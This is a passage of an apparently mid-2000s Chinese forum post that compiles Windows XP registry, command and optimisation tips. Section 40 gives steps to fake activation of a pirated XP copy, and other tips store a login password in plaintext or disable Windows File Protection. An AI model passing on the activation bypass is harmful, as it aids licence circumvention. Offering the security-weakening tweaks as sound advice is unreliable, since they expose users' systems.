第1步:运行“regedit”,以打开“注册表管理器”;运行注册表编辑器,依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon ]分支,然后在右侧窗口双击“DefaultUserName”,接着输入你的登录用户名。如果没有预设的用户名称,可以在注册表编辑器的菜单栏点选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目,注意要区分大小写字母。  

  第2步:同样在该分支下,在注册表编辑器的右侧窗口中双击“DefaultPassword”,假如未发现“DefaultPassword”一项,可按上面的步骤来新建该字符串值。  

  第3步:接下来在右侧窗口中双击“AutoAdminLogon”,将数值设置为“1”。假如未发现“AutoAdminLogon”,可按上面的步骤来新建。  

  现在关闭注册表编辑器并重新启动电脑,以后你会发现那个令人讨厌的登录对话框不见了。


三十五、Windows注册表详解

作者:骆诚

    在Windows文件夹中有system.dat和user.dat这样两个隐藏文件,其中保存了至关重要的注册表信息。我们可以通过运行regedit.exe来修改windows的设置,达到其他方法不能达到的效果,使Windows更如你意。本说明书的内容以Win98第一版为准,但多数也是适用于Win95、Win95osr2、Win98se甚至Win2000的。

  一、注册表根键说明

  hkey_classes_root 包含注册的所有OLE信息和文档类型,是从 hkey_local_machine\software\classes复制的。
  hkey_current_user 包含登录的用户配置信息,是从hkey_users\当前用户子树复制的。
  hkey_local_machine 包含本机的配置信息。其中config子树是显示器打印机信息; enum子树是即插即用设备信息;system子树是设备驱动程序和服务参数的控制集合;software子树是应用程序专用设置。
  hkey_users 所有登录用户信息。
hkey_current_config 包含常被用户改变的部分硬件软件配置,如字体设置、显示器类型、打印机设置等。是从hkey_local_machine\config复制的。
  hkey_dyn_data 包含现在计算机内存中保存的系统信息。

  二、注册表详细内容
  Hkey_local_machine\software\microsoft\windows\currentVersion\explorer\user shell folders 保存个人文件夹、收藏夹的路径
  Hkey_local_machine\system\currentControlSet\control\keyboard Layouts保存键盘使用的语言以及各种中文输入法
Hkey_users\.Default\software\microsoft\internet explorer\typeURLs保存IE浏览器地址栏中输入的URL地址列表信息。清除文档菜单时将被清空。
  Hkey_users\.Default\so..\mi..\wi..\currentVersion\ex..\menuOrder\startMenu 保留程序菜单排序信息
Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\RunMRU 保存“开始 * 运行...“中运行的程序列表信息。清除文档菜单时将被清空。
  Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\ecentDocs 保存最近使用的十五个文档的快捷方式(删除掉可解决文档名称重复的毛病),清除文档菜单时将被清空。
  Hkey_local_machine\software\microsoft\windows\currentVersion\uninstall 保存已安装的Windows应用程序卸载信息。
hkey_users\.default\software\microsoft\windows\currentVersion\applets 保存Windows应用程序的纪录数据。
Hkey_local_machine\system\CurrentControlSet\services\class 保存控制面板-增添硬件设备-设备类型目录。
  Hkey_local_machine\system\CurrentControlSet\control\update 立即刷新设置。值为00设置为自动刷新,01设置为手工刷新[在资源管理器中按F5刷新]。
HKEY_CURRENT_USER\Control Panel\Desktop 新建串值名MenuShowDelay=0 可使“开始”菜单中子菜单的弹出速度提高。新建串值名MinAnimate,值为1启动动画效果开关窗口,值为0取消动画效果。
  Hkey_local_machine\software\microsoft\windows\currentVersion\run 保存由控制面板设定的计算机启动时运行程序的名称,其图标显示在任务条右边。[启动文件夹程序运行时图标也在任务条右边]
hkey_users\.default\software\microsoft\windows\currentVersion\run保存由用户设定的计算机启动时运行程序的名称,其图标显示在任务条右侧。
HKEY_CLASS_ROOT/Paint.Pricture/DefaultIcon 默认图片的图标。双击窗口右侧的字符串,在打开的对话框中删除原来的键值,输入%1。重新启动后,在“我的电脑”中打开Windows目录,选择“大图标“,然后你看到的Bmp文件的图标再也不是千篇一律的画板图标了,而是每个Bmp文件的略图。
  Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ Policies\ Ratings 保存IE4.0中文版“安全”*“分级审查”中设置的口令(数据加密)。
  Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ explorer\ desktop\nameSpace保存桌面中特殊的图标,如回收站、收件箱、MS Network等。

  三、怎样存取注册表信息
  可以通过VB5.0提供的两个语句和两个函数在程序中读写注册表。
  1、SaveSetting语句
  语法. SaveSettingappname,section,key,setting
  2、GetAllSettings函数
  语法. GetAllSettings(appname,section)
  3、GetSetting函数
  语法. GetSetting(appname,scetion,key[,default])
  4、DeleteSetting语句
  语法. DeleteSettingappname,section,[key]
  参数含义.
  appname. 字符串表达式,应用程序名
  section. 字符串表达式,小节名
  key. 字符串表达式,关键字名
  setting. 表达式,关键字设定值
  下面通过实例来说明它们的用法. 应用程序名为jld_app,小节名为startup,关键字为left。
  在注册表中建立应用程序的注册项.
  SaveSetting“jld_app”,“startup”,“left”,100
  从应用程序注册表项中读取所有关键字及其对应的值.
  Dimmysettings(10,10)AsVariant
  DimsettingindexAsInteger
  GetAllSettings“jld_app”,“startup”
  Forsettingindex=LBound(mysettings,1)ToUBound(mysettins,1)
  Debug.Printmysettings(settingindex,0);“=”;mysettings(settingindex,1)
  Nextsettingindex
  EndSub
  从应用程序注册表项中读取关键字“left“的设置.
  Debug.PrintGetSetting(“jld_app”,“startup”,“left”,“notok”)
  从WIN98注册表中删除小节“startup”
  DeleteSetting“jld_app”,“startup”
  四、注册表的备份
  Windows每次启动都会自动对注册表进行备份。放在windows\sysbckup里的rb00X.cab文件里,出注册表出现问题,在DOS下用extract /e展开,拷贝回去就可以了。


三十六、Windows XP 常见的进程列表

最基本的系统进程(也就是说,这些进程是系统运行的基本条件,有了这些进程,系统
就能正常运行)

smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
(系统服务)
产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标

附加的系统进程(这些进程不是必要的,你可以根据需要通过服务管理器来增加或减
少)
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表操作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务
的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000
Professional 桌面会话以及运行在服务器上的基于 Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

以下服务很少会用到,上面的服务都对安全有害,如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000
Professional 的能力。(系统服务)
支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及
Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服
务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统
服务)
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其
它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服
务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制
安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存
储点,以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统
服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系
统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息,然后将消息传递
到运行在这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)


三十七、xp的boot.ini文件内容

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Profession"

三十八、windowsXP你不可不知道的秘密哦!

自从微软发布Windows XP以来,Windows XP已经得到人们越来越广泛的应用,微软也宣称它是迄今为止最好的操作系统。Windows XP到底有什么出色的地方?让我秒杀先来告诉你其中的一些小秘密吧!
●关闭自动播放功能
一旦您将媒体插入驱动器,自动运行就会从驱动器中读取数据,这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能:点“开始”→“运行”,在对话框中输入“gpedit.msc” →“计算机配置”→“管理模板”→“系统”,双击“关闭自动播放”,在“设置”中选“已启用”,确定即可。
●使ZIP文档读取能力失效
Windows XP默认支持.ZIP文档,但系统会为此耗费大量资源,你可以将这一功能关闭,只需在“开始”选单的“运行”中输入“regsvr32/u zipfldr.dll”即可。
●卸载无用的动态链接
资源管理器经常在内存中留下无用的动态链接,为了消除这种现象,你可以打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0,这一功能就会被关闭。注意:为了让设置生效,需要重新启动计算机。
●消除Windows文档保护功能
为了完全消除Windows文档保护功能,打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon SFCDisable=0xFFFFFF9D
●查看驱动器组件信息
右键点击“我的电脑”,点选弹出选单中的“管理”,依次打开“可移动存储”→“库”,用右键点击所要查询的驱动器,点选弹出选单中的“属性”,点选“设备信息”就可看到驱动器的信息了。
●在关机时清空页面文件
打开“控制面板”,点击“管理工具”→“本地安全策略”→“本地策略”→“安全选项”,双击其中“关机:清理虚拟内存页面文件”一项,点击弹出选单中的“已启用”选项,单击“确定”即可。


三十九、WinXP开机菜单含义

在启动时按F8键或当计算机不能正常启动时,就会进入Windows XP启动的高级选项菜单,在这里可以选择除正常启动外的8种不同的模式启动Windows XP。

(1)安全模式:选用安全模式启动Windows XP时,系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题,或者根本无法启动安全模式,那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。

(2)网络安全模式:和安全模式类似,但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障,此选项很有用。

(3)命令提示符的安全模式:也和安全模式类似,只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符,而不是Windows桌面。

(4)启用启动日志:启动Windows XP,同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt,位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。

(5)启用VGA模式:使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序,或由于刷新频率设置不当造成故障时,这种模式十分有用。当在安全模式下启动Windows XP时,只使用最基本的显卡驱动程序。

(6)最近一次的正确配置:选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动,Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。

(7)目录服务恢复模式:不适用于Windows XP Professional。这是针对Windows XP Server操作系统的,并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。

(8)调试模式:启动Windows XP,同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP,可以看到与使用远程安装服务恢复系统相关的附加选项。


四十、XP轻松实现免激活升级

1.安装D版windows xp
2.打开注册表regedit
3.找到主键 Hkey_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\WPAEvents\
4.删除子键lastWPAEventLoged
5.修改子键OOBETimer键值为:ff d5 71 d6 8b 6a 8d 6f d5 33 93 fd
6.右击注册表中“WPAEvents”键→“权限”→“高级”→“所有者”→你的用户名→“应用”→“确定”
7.回到“安全”标签→“高级”→选择列表中的“system”→“编辑”
8.把“拒绝”列下的方框全部打勾即可
9.“确定”退出
重起动发现已激活。这种方法可顺利升级!!!
级别: 光盘中级
发帖
1140
飞翔币
335
威望
303
飞扬币
8460
信誉值
0
只看该作者 2 发表于: 2006-12-28
[size=12px]四十一、WinXP瘦身办法

??Windows XP安装后要占约1.5GB的硬盘空间,能不能让它也赶赶潮流,瘦一下身呢?跟我来。

??1.删除系统文件备份
??进入“WINDOWS\system32\dllcache”目录(默认为隐藏目录),里面存储着约360MB的文件,它们是Windows XP系统文件的备份。当Windows XP的系统文件被替换、删除或修改时,系统可以自动从中提取出相应的系统文件进行还原,从而保证了系统的稳定性。如果你有Windows XP安装光盘或者已经将安装文件拷贝到硬盘上,那么你大可将此文件夹删除。注意:该文件夹不能直接删除,要在命令提示符下输入“sfc.exe /purgecache”(注意斜线前的空格)命令进行清除。

??2.删除驱动备份
??Windows XP自带了大量的硬件驱动程序,当检测到新硬件时系统会自动地提取相应的驱动程序进行安装。其实,多数情况下我们很少改变自己的硬件配置,因此在确定自己所需要的硬件驱动程序已经全部安装的情况下,可以将驱动备份文件删除。进入“WINDOWS\Driver Cache\i386”目录,找到名为“Driver.cab”的压缩文件,删除即可。此举可以释放出约73MB的硬盘空间。如果以后安装新硬件时系统找不到驱动程序,可以从安装光盘中提取。

??3.删除不用的输入法
??在Windows XP下有几种我们根本用不着的输入法,比如日文、韩文输入法等。删除的方法是:进入“控制面板→日期、时间、语言和区域设置→区域和语言选项”,选择“语言”选项卡,将“为东亚语言安装文件”前面的钩去掉,点“确定”后依提示删除不需要的语言选项。重新启动后,到“WINDOWS\ime”文件夹下直接删除“chtime”、“imjp8_1”和“imkr6_1”三个文件夹(它们分别对应繁体中文、日文、韩文)即可。此举可以释放约85MB的硬盘空间。

??4.清空系统临时文件
??在“\Documents and Settings\用户名\LocalSettings\Temp”目录下(默认为隐藏目录)存储的是软件安装或运行时留下的临时文件夹和废弃的文档,可以清空该目录。如果你是第一次这样操作,那么有可能释放出上百MB的硬盘空间。注意:这招可以经常使用。

四十二、XP瘦身,减肥大全

一、让系统盘更清净(可以在一定程序上保证你的电脑运行速度)
1、进入:控制面板--系统--高级--环境变量
2、单击用户变量中的TEMP--编辑--将那一长串内容变为D:\TEMP(根据你需要,可改成其它盘,但不是系统所在的就行了)
3、同上,将TMP同样改为D:\TEMP。因为这些东西是让你的系统盘快速膨胀的主要内患,其属性是隐藏的,有些朋友还找不到呢:)
4、在“系统变量”同样将TEMP和TMP改成上面的。
5、右键单击桌面“我的文档”--属性--目标文件夹中设置“目标文件夹位置”,将其改为D:\My Documents或D:\我的文档(喜欢哪个由你了),然后可选移动。
  这个很重要,事实上当我们的电脑崩溃后,在系统盘中一般没有什么重要的东西,有用的都在My Documents中了,所以把它给挪个窝,你就什么也不用担心了,还有,有相当一部分朋友在DOS模式下还不会备份My Documents中的内容(因为那个文件夹名称很长,如果你用了中文,那就更麻烦了)
6、右键单击Internet Explorer--属性--常规--Internet临时文件--设置--移动文件夹--选择D:\Temporary Internet Files\(如果没有,可先创建,当然可用D:\TEMP或其它什么,你说了算)--确定
7、系统--高级--性能--设置--高级--虚拟内存--更改--选择D或其它非系统分区--自定义大小--输入大小M--设置;选C或系统所在分区--无分页文件--设置--确定,这样就把虚拟存储器也转到其他硬盘上了。
好了,这个世界(系统盘)清静了:)


(转者注:虚拟内存,temp,tmp我曾转过,但在装某些软件的时候有些不妥又改了回去,若改建议一定要记住原路径。)
二,给XP减肥 (如果你的硬盘够用,可以不减了,因为万一想用其中的某个功能,你就没办法了
1.删除系统文件备份
sfc.exe /purgecache
2.删除驱动备份
windows\driver cache\i386目录下的Driver.cab文件(73mb)
3.取消系统还原(但记得要保留系统盘的系统还原哟,如果你不想用,就全给关闭了,反正我是保留着:)
4.删除Help文件(减掉40多mb)
5.删掉\WINDOWS\system32\dllcache下文件(减去200-300mb),这是备用的dll文件
只要你已拷贝了安装文件,完全可以这样做。
6.将工具软件装在系统盘,应用软件装在其他硬盘,特别提醒:你的FOXMAIL、QQ还有类似这样的东东,千万不可装在系统盘中,一旦系统完了,你也就OVER了:)(这对重装系统也有好处)。
7.删除\windows\ime下不用的输入法!(日文,韩文,简体中文输入法,84.5MB)
8.如果你认为自己有能力对付一些突发事件的话,就用ntfs装xp吧,本身就节省硬盘。不要装好汉,否则,等着CRY吧:P
三,删除烦人的msn,windows messenger
到C:\windows\inf\ 打开sysoc.inf
找 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 ,删除 hide,
变成msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 ,保存。
到控制面板-添加删除程序,就有选项可以删除了。
四,让难以胜任工作的华医生Dr.Watson下岗
   这医生看着电脑生病,只告诉你可能是什么症状(里面的症状描述我想信他自己都不知道什么意思),但不会告诉你得了什么病,最主要的是根本不给你看病(解决问题),这样的医生要他何用,还不如我,让他下岗吧:)
  在"开始"->"运行"中输入"drwtsn32"命令,或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson",调出系统里的华医生Dr.Watson ,只保留"转储全部线程上下文"选项(否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间)。
、卸载无用的动态链接

五,删除资源管理器经常在内存中留下无用的动态链接,为了消除这种现象,你可以打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0,这一功能就会被关闭。重新启动计算机。
六,小硬盘用户有福了,有刻录机的朋友可以做gho版的XP了。
首先了解xp刚全新安装好的时候1.5G左右,默认的休眠和虚拟内存文件已经占了310m,把这两个关了可减至1.2G;把c:\windows\dllcab里面的两个压缩(只起不必每次都放系统碟作用)包80m删了,减至1.1G;还有把30m的日文和日文字典删了(我讨厌XXXXX),把c:\windows\fon里不必要的字体删了(50m左右),减至1G;把c:\windows\system32\dllcab里面的全删了,那是dll副本320m可以放心删,至此减至680m;还有其他的250m忘了(有点过分的,微软知道会很不高兴的),有兴趣的朋友自己找,听说最低可以减至400m以下。
小心别删错了,本文只供参考,后果请自负。

七,让WINXP彻底瘦身的软件出来了!!可以卸载任何捆绑组件。包括IE。OUTLOOK,甚至Movie Maker ,MSN等等。
就是这个:XPlite 
下载地址很多,这里提供2个:

http://www.onlinedown.net/soft/25033.htm
http://download.pchome.net/php/s ... mp;searchstr=XPlite

XPlite and 2000lite Professional 是一款功能非常强大的Windows XP和Windows 2000操作系统模块定制工具,程序运行后首先会取消Windows的系统文件保护功能,然后会自动扫描并获取当前操作系统中的软件配置情况,然后允许你任意卸载原本是操作系统中无法卸载删除的模块,比如操作系统原来自动安装的移动向导功能,计划任务功能,Windows SCript Host模块,核心字体模块,帮助和支持中心模块,语音功能模块,ODBC数据库驱动模块,搜索助手模块,Windows教程,驱动缓存模块,还有传真模块,聊天室模块,网络会议和电话拨号模块等等!程序共包含9大类几十种设定功能,通过此程序,你完全可以定制出一个属于自己独特的WindowsXP或者2000,也可以通过优化选择,作出只包含核心模块的最简操作系统,让WindowsXP和2000彻底瘦身。

建议使用前做好备份!!!(转者没用)

八,另删
一,删除所有原各文档内容;
二,删除原桌面背景;
三,删除原屏保程序(只保留了一个);
四,删除所有原游戏;
五,删除共享文档。
以上内容我是在安全模式下用管理员身份删除的,有的还在注册表中有键值,你可搜搜全部删除。(千万别删错了)

九,删除其它无用文件建议使用supercleaner

十, NTFS分区中的文件压缩

  Windows XP对NTFS分区的文件提供了文件压缩属性,可有效的节省磁盘空间。

  在NTFS分区中,选择要压缩的文件或文件夹,单击鼠标右键,在快捷菜单中选择“属性”命令,然后在“属性”对话框的“常规”选项卡中单击“高级”按钮,在新对话框中的“压缩或加密属性”栏里勾选“压缩内容以便节省磁盘空间”复选框,在“确定”后你会发现文件所占用的磁盘空间大大减少了。

四十三、体验Windows XP系统内置的AT命令

  AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。

  我们可以在“开始→运行”中输入AT命令,下面就来看看AT命令的一些实例分析。

  1、定时关机

  命令:at 21:00 ShutDown –S –T30

  该命令运行后,到了21:00点,电脑会出现“系统关机”对话框,并默认30秒延时自动关机。

  2、定时提醒

  命令:at 12:00 Net Send 10.10.36

  .122与朋友约会的时间到了,快点准备出发吧!

  其中Net Send是Windows内部程序,可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。

  3、自动运行批处理文件

  如果公司的数据佷重要,要求在指定的日期/时间进行备份,那么运行:

  命令:at 1:00AM /Every:Saturday My_BackUp.bat

  这样,在每个Saturday(周六)的早上1:00点,电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件,它包含能对系统进行数据完全备份的多条命令。

  4、取消已经安排的计划

  命令:at 5 /Delete

  有时候,你已经安排好的计划可能临时变动,这样你可以及时地用上述命令删除该计划(5为指派给已计划命令的标识编号),当然,删除该计划后,可以重新安排。

四十四、WinXP/2000操作系统自动关机的实现

Windows XP(Windows 2000也可以)自身就具备定时关机的功能,下面我们就来看看如何实现Windows XP的自动关机。

  Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中。如果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。
  比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60分钟后自动关机,“3600”代表60分钟。

   设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。

  Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如“-s”就表示关闭本地计算机,“-a”表示取消关

机操作,下面列出了更多参数,大家可以在Shutdown.exe中按需使用。

用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]

没有参数 显示此消息(与 ? 相同)
-i 显示 GUI 界面,必须是第一个选项
-l 注销(不能与选项 -m 一起使用)
-s 关闭此计算机
-r 关闭并重启动此计算机
-a 放弃系统关机
-m \\computername 远程计算机关机/重启动/放弃
-t xx 设置关闭的超时为 xx 秒
-c "comment" 关闭注释(最大 127 个字符)
-f 强制运行的应用程序关闭而没有警告
-d [p]:xx:yy 关闭原因代码
u 是用户代码
p 是一个计划的关闭代码
xx 是一个主要原因代码(小于 256 的正整数)
yy 是一个次要原因代码(小于 65536 的正整数)

  -f:强行关闭应用程序

  -m \\计算机名:控制远程计算机

  -i:显示图形用户界面,但必须是Shutdown的第一个选项

  -l:注销当前用户

  -r:关机并重启

  -t时间:设置关机倒计时

  -c "消息内容":输入关机对话框中的消息内容(不能超127个字符)

四十五、 WINXP优化精髓

加快开机与关机的速度:

①选“开始\运行”,键入Regedit,展开HKEY_CURRENT_USER\Control Panel\Desktop,将字符串值“HungAppTimeout”的数值更改为200,再将字符串值“WaitToKillAppTimeout”的数值数据更改为1000;

②另在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control下,将字符串值“HungAppTimeout”的数值数据更改为200,将字符串值“WaitToKillServiceTimeout”的数值数据更改为〔1000〕;

③使用微软 Bootvis.exe 优化启动速度。我们到微软官方网站先下载 bootVis.exe,然后解压后运行bootvis.exe,之后在Trace下选next boot和driver delays等,此后XP会重新启动,并将记录启动数据产生成BIN的文件。再在“file\open中打开这个文件,在Trace下选Optimize system即可。
提示:此优化需时颇长,请耐心等待。

清除注册表内不用的DLL文件:

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕
增加一个机码〔AlwaysUnloadDLL〕默认值为〔1〕
如默认值设定为〔0〕则代表停用此功能

加快宽频连接速度:

在〔开始〕\〔运行〕\键入〔regedit〕\在〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Policies〕\〔Microsoft〕 \〔Windows〕
增加一个名为〔Psched〕的机码
在〔Psched〕右面窗口增加一个 Dword 值〔NonBestEffortLimit〕数值数据为〔0〕
『仅适用用 Windows XP 家用版本』

加快菜单显示速度:

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_CURRENT_USER〕\〔Control Panel〕\〔Desktop〕\将字符串值〔MenuShowDelay〕的数值数据更改为〔0〕
调整后如觉得菜单显示速度太快而不适应者可将〔MenuShowDelay〕的数值数据更改为〔200〕
重新启动生效 。

加快自动更新率:

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔System〕\〔CurrentControlSet〕\〔Control〕\〔Update〕\将 Dword〔UpdateMode〕的数值数据更改为〔0〕。重新启动生效。

关闭启动时加载不需要的程序:

如开机时有太多的程序要运行会影响开机的速度,先检查哪些些档案会在开机时运行
在〔开始〕\〔运行〕\键入〔msconfig〕\选〔启动〕
在启动内的程序是代表开机时要运行的程序,如需暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可,如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可。

停用不需要的服务:
在〔开始〕\〔运行〕\键入〔services.msc〕打开服务窗口
检查右边窗口将不需要的服务在〔启动类型〕内选〔已禁止〕;再在〔服务状态〕中选〔停用〕

善用 CPU 的 L2 Cache 加快整体效能:

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕\〔CurrentControlSet〕\〔Control〕\〔SessionManager〕\在〔MemoryManagement〕的右边窗口将〔SecondLevelDataCache〕的数值数据更改为与 CPU L2 Cache 相同的十进制数值
例:P4 1.6G 的 L2 Cache 为 256Kb,数值数据更改为十进制数值 256
有关 L2 Cache 的数值并非如某些不负责任的网页乱抄过来,例如 P4 1.6G 的 L2 Cache 为 256Kb,但 P4 1.6GA 的 L2 Cache 为 512Kb
读者可以通过网络查询到有关 CPU 的 L2 Cache 的资料。

在启动计算机时运行 Defrag 程序 :

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Dfrg〕\〔BootOptimizefunction 〕
将字符串值〔Enable〕设定为〔Y〕等于开启,而设定为〔N〕等于关闭。

减少多重启动时等待时间:

方法一:用 Notepad 打开在 C:\ 目录下的 boot.ini 档案,将内容〔timeout〕的设定值由预设的 30 (秒) 改为要求等待的秒数数字,存盘。
方法二:也可以通过〔开始〕\〔运行〕\键入〔msconfig〕,打开boot.ini 选项,进行秒数的修改。
方法三:右键点击“我的电脑”,选择属性\高级\启动和故障恢复\设置,在此修改启动等待时间。

关闭 XP 内设的烧碟功能:

如果不打算使用此功能可将其关闭,可加快使用 Nero 烧录软件的速度,因为Windows XP 的烧录系统由 Roxio 公司提供 (即与 Easy Cd Creator 同公司)。
在〔控制面板〕\〔管理工具〕\〔服务〕\在右边窗口选〔IMAPI CD-Burning COM Service〕\〔启动类型〕\选〔已停用〕

关机时自动关闭停止响应程序:

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_USERS〕\〔.DEFAULT〕\〔Control Panel〕\在〔Desktop〕右面窗口将〔AutoEndTasks〕的数值资料改为〔1〕
注销或重新启动即可。

移除Windows Messenger:

先用 Wordpad 打开 X:\WINDOWS\inf 下的 sysoc.inf 档案
X=(XP所在的磁盘区)
将内容〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7〕
更改为〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7〕
存档及退出
然后在〔控制面板〕\〔添加或删除程序〕\〔添加/删除 Windows 组件〕\不选〔Windows Messenger〕\〔下一步〕\〔完成〕后便成功移除。

停止“磁盘空间不足”的通知 :

当磁盘驱动器的容量少于 200MB 时 Windows XP 便会发出“磁盘空间不足”的通知
如需停止此功能,可按下面程序更改登录文件
